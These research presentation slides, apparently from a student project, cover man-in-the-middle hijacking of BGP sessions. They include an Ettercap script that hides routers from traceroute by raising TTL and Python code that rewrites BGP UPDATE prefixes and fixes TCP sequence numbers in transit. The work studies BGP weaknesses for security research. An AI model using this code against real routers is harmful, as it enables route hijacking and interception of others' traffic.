
A Study in TCP/BGP Session Security



  1. A Study in TCP/BGP Session Security By Ilias Pallikarakis

  2. Motivation • Inadequate security in BGP • Defcon 16 presentation by Pilosov and Kapela • Is it possible to replicate their attacks using a MitM approach?

  3. BGP Security • Mechanisms currently used: • TCP-MD5 • Generalized TTL Security Mechanism (GTSM) • Mechanisms not yet deployed: • TCP-AO • RPKI

  4. Defcon 16 Presentation Overview They successfully advertised fake prefixes. They made the attack hard to detect by making the router that advertised the fake prefixes 'undetectable' by traceroute.

  5. Main Goals • Set up a MitM position between two routers and attempt to hijack the BGP session • Implement a script similar to the Defcon 16 one to hide part of the network

  6. Tools Used • Ettercap: • MitM (ARP poisoning) • Network hiding • Scapy: • Network hiding • BGP session hijacking

  7. Tools Used • Ettercap: • Easy to use • Good for simple scripts, not for complex ones • No user interaction • Scapy: • Python library • Automatically calculates length/checksum fields • Much slower

  8. Testing Network

  9. General Methodology • Hide the network: • Exploit how traceroute works (it maps hops by sending probes whose TTL expires at each successive router) • Increase the TTL of probes passing through the hidden hops so those hops never expire them and never appear in the trace • BGP session hijacking: • Intercept the BGP UPDATE messages • Find a specific prefix and alter it

  10. BGP Hijacking Issues • Recompute the IP/TCP checksums • Adjust the variable-length fields: • IP total length • BGP header length • BGP UPDATE length fields (withdrawn routes length, total path attribute length) • TCP session manipulation (sequence/acknowledgement numbers)

  11. TCP Session Manipulation What if the altered BGP prefix has a different length than the original? The sequence/acknowledgement numbers must be adjusted: • Keep the offset and add/subtract it (best) • Copy the previous sequence number into the next acknowledgement and vice versa (easiest)

  12. Sequence Adjusting Mechanism • The next acknowledgement number is always the previous sequence number + the original message's length • For the sequence number there are 2 cases: • The previous message was sent by the receiver (use the previous ack) • The previous message was sent by the sender (use the previous forged seq)
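The "keep the offset" variant from slides 11 and 12, as an added worked example (this is not code from the deck). It is a pure-Python translator that a MitM calls once per forwarded segment: it tracks, per direction, how many bytes longer the rewritten stream is than what the endpoint actually sent, shifts outgoing sequence numbers by that amount and shifts incoming acknowledgements back. The class name, the `demo_exchange` trace and the 1000/5000 sequence numbers are constructed for illustration; the code assumes in-order delivery and no SACK or retransmission straddling a modification.

```python
class SeqAckTranslator:
    """Keep TCP sequence/acknowledgement numbers consistent across a MitM
    that changes payload lengths (the 'keep the offset' method).

    delta[(src, dst)] is how many bytes longer (negative: shorter) the
    rewritten src->dst byte stream is than what src actually sent.
    Assumption: segments are forwarded in order and every ack refers to
    data sent after the last length change (no SACK, no retransmission
    straddling a modification).
    """

    MASK = 0xFFFFFFFF  # TCP sequence space wraps at 2^32

    def __init__(self):
        self.delta = {}

    def forward(self, src, dst, seq, ack, orig_len, new_len):
        """Translate one segment travelling src->dst whose payload length
        changed from orig_len to new_len. Returns (seq, ack) to put on the
        forwarded segment."""
        d_fwd = self.delta.get((src, dst), 0)  # offset already applied to this stream
        d_rev = self.delta.get((dst, src), 0)  # offset the peer's stream carries
        # The receiver has already seen d_fwd extra bytes, so our seq moves forward by it.
        new_seq = (seq + d_fwd) & self.MASK
        # src acknowledges the rewritten dst->src stream; dst numbers its own
        # stream without our additions, so subtract them before forwarding.
        new_ack = (ack - d_rev) & self.MASK
        # Record this segment's change for everything that follows.
        self.delta[(src, dst)] = d_fwd + (new_len - orig_len)
        return new_seq, new_ack


def demo_exchange():
    """Constructed exchange: router A sends a 40-byte UPDATE that the MitM
    grows to 44 bytes, B acks it, A sends 20 more bytes unchanged, B acks."""
    t = SeqAckTranslator()
    trace = []
    trace.append(t.forward("A", "B", seq=1000, ack=5000, orig_len=40, new_len=44))
    trace.append(t.forward("B", "A", seq=5000, ack=1044, orig_len=0, new_len=0))
    trace.append(t.forward("A", "B", seq=1040, ack=5000, orig_len=20, new_len=20))
    trace.append(t.forward("B", "A", seq=5000, ack=1064, orig_len=0, new_len=0))
    return trace


if __name__ == "__main__":
    for seq, ack in demo_exchange():
        print("seq=%d ack=%d" % (seq, ack))
```

In the constructed trace B's acknowledgement of 1044 is forwarded to A as 1040, which is exactly what A expects after sending 40 original bytes, and A's next segment leaves the MitM with sequence 1044 so that B sees a gap-free stream. The "easiest" method on slide 11 (mirroring the previous sequence into the next acknowledgement) avoids keeping state per direction but breaks as soon as one side has more than one segment in flight.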

  13. Example

  14. Ettercap TTL Script In one word: simple...
  if (ip.dst == '1.1.1.1') {
      ip.ttl += 3;
      msg("Increase TTL\n");
  }

  15. Ettercap Script for BGP Not possible: • The binary payload would have to be processed by hand • Cannot manipulate variable-length fields • Can only replace 2-byte strings

  16. Scapy Methodology Scripts are composed of: • Main: creates the nfqueue and calls Process • Process: mainly filters packets and calls the altering function • Altering function: varied content, does the packet altering

  17. Scapy BGP Issues • Originally Scapy could not understand multiple BGP UPDATE messages in the same TCP packet: • It would read only the first UPDATE • Incorrect length calculation • Unexpected session establishment: • While a TCP/BGP session was working, one of the routers attempted to set up a new one

  18. BGP Issue Solutions • Multiple BGP UPDATE messages: • Use the header marker to find how many messages appear • Modified the original Scapy BGP code • Unexpected sessions: • Drop all packets where one port is 179 and the other is NOT the working session's port
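An added example, not the deck's Scapy patch, covering the length problems of slide 10 and the multiple-UPDATE problem of slides 17 and 18 in plain Python: walk a TCP payload one BGP message at a time, check the 16-byte all-ones marker at every boundary, rewrite a prefix in the NLRI of each UPDATE, and recompute the header length. It returns the byte delta so it can feed the sequence/acknowledgement adjustment. The function names and the sample prefixes (10.0.0.0/8, 192.0.2.0/24, 203.0.113.0/24) are constructed; the code handles IPv4 NLRI only and leaves withdrawn routes and path attributes untouched.

```python
import ipaddress
import struct

MARKER = b"\xff" * 16   # BGP message header marker (RFC 4271 all ones)
BGP_UPDATE = 2          # message type code for UPDATE


def encode_nlri(prefix):
    """Encode an IPv4 prefix ('10.0.0.0/8') as NLRI: length byte + minimal octets."""
    net = ipaddress.IPv4Network(prefix)
    nbytes = (net.prefixlen + 7) // 8
    return bytes([net.prefixlen]) + net.network_address.packed[:nbytes]


def decode_nlri(data):
    """Decode consecutive NLRI entries into a list of prefix strings."""
    prefixes, i = [], 0
    while i < len(data):
        plen = data[i]
        nbytes = (plen + 7) // 8
        raw = data[i + 1:i + 1 + nbytes] + b"\x00" * (4 - nbytes)
        addr = int.from_bytes(raw, "big")
        prefixes.append(str(ipaddress.IPv4Network((addr, plen), strict=False)))
        i += 1 + nbytes
    return prefixes


def build_update(prefixes, path_attrs=b""):
    """Build one BGP UPDATE carrying the given NLRI (constructed test data)."""
    body = struct.pack("!H", 0)                          # withdrawn routes length = 0
    body += struct.pack("!H", len(path_attrs)) + path_attrs
    body += b"".join(encode_nlri(p) for p in prefixes)   # NLRI fills the rest
    return MARKER + struct.pack("!HB", 19 + len(body), BGP_UPDATE) + body


def split_messages(payload):
    """Walk a TCP payload that may carry several BGP messages.

    The header length field says where the next message starts; the marker
    is verified at every boundary. Searching for the marker alone would be
    unsafe, since 16 consecutive 0xff bytes can legitimately occur in data.
    Returns a list of (type, body) tuples."""
    msgs, i = [], 0
    while i < len(payload):
        if payload[i:i + 16] != MARKER:
            raise ValueError("bad marker at offset %d" % i)
        length, mtype = struct.unpack("!HB", payload[i + 16:i + 19])
        if length < 19 or i + length > len(payload):
            raise ValueError("bad length %d at offset %d" % (length, i))
        msgs.append((mtype, payload[i + 19:i + length]))
        i += length
    return msgs


def rewrite_prefix(payload, old, new):
    """Replace prefix `old` with `new` in every UPDATE's NLRI and recompute
    each header length. Returns (new_payload, byte_delta); the delta is what
    the TCP seq/ack fixup needs when the prefix length changes."""
    out = b""
    for mtype, body in split_messages(payload):
        if mtype == BGP_UPDATE:
            wlen = struct.unpack("!H", body[:2])[0]
            alen = struct.unpack("!H", body[2 + wlen:4 + wlen])[0]
            head = body[:4 + wlen + alen]                # withdrawn + attrs untouched
            nlri = decode_nlri(body[4 + wlen + alen:])
            nlri = [new if p == old else p for p in nlri]
            body = head + b"".join(encode_nlri(p) for p in nlri)
        out += MARKER + struct.pack("!HB", 19 + len(body), mtype) + body
    return out, len(out) - len(payload)


if __name__ == "__main__":
    # Two UPDATEs in one TCP segment, as the routers in the lab sent them.
    payload = build_update(["10.0.0.0/8", "192.0.2.0/24"]) + build_update(["203.0.113.0/24"])
    new, delta = rewrite_prefix(payload, "10.0.0.0/8", "10.0.0.0/24")
    for mtype, body in split_messages(new):
        print("type", mtype, "nlri", decode_nlri(body[4:]))
    print("payload grew by", delta, "bytes")
```

Changing 10.0.0.0/8 to 10.0.0.0/24 adds two NLRI octets, so the first header's length field goes from 29 to 31 and the whole segment grows by 2 bytes; the IP total length, the TCP checksum and the sequence offset for that direction all have to move by the same amount. The second UPDATE is untouched but is still found and re-emitted, which is the part that a parser reading only the first message gets wrong.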

  19. Cisco Issue: Description Strange packets observed of the form: Circumstances of appearance: • Changing the prefix length with incorrect seq/ack numbers • Changing the prefix to a shorter length with the working script (occasionally)

  20. Cisco Issue: Thoughts Definitely related to the seq/ack numbers. Tests showed that when the ack is larger the issue always appears. Why does it appear with the correct script?

  21. Cisco Issue: Thoughts • Test the correct script for a potential mistake • Thoroughly check the TCP flags before the strange packets • Check the strange traffic message by message against the same traffic as sent by the router

  22. Conclusion • Working script (implemented in two different ways!) to increase the TTL • Successful traceroute veil • Undermines GTSM: an on-path attacker that rewrites the TTL can make its packets look like they came from a directly connected neighbour • Working TCP adjusting mechanism • Could be used for any TCP communication

  23. Conclusion • Successfully replaced a prefix with one of our choice using Scapy • Contributed to Scapy's BGP layer, allowing multiple UPDATEs to be sent/received in one packet • Discovery of the Cisco issue

  24. Tests Live Demonstration !

  25. Thank You !
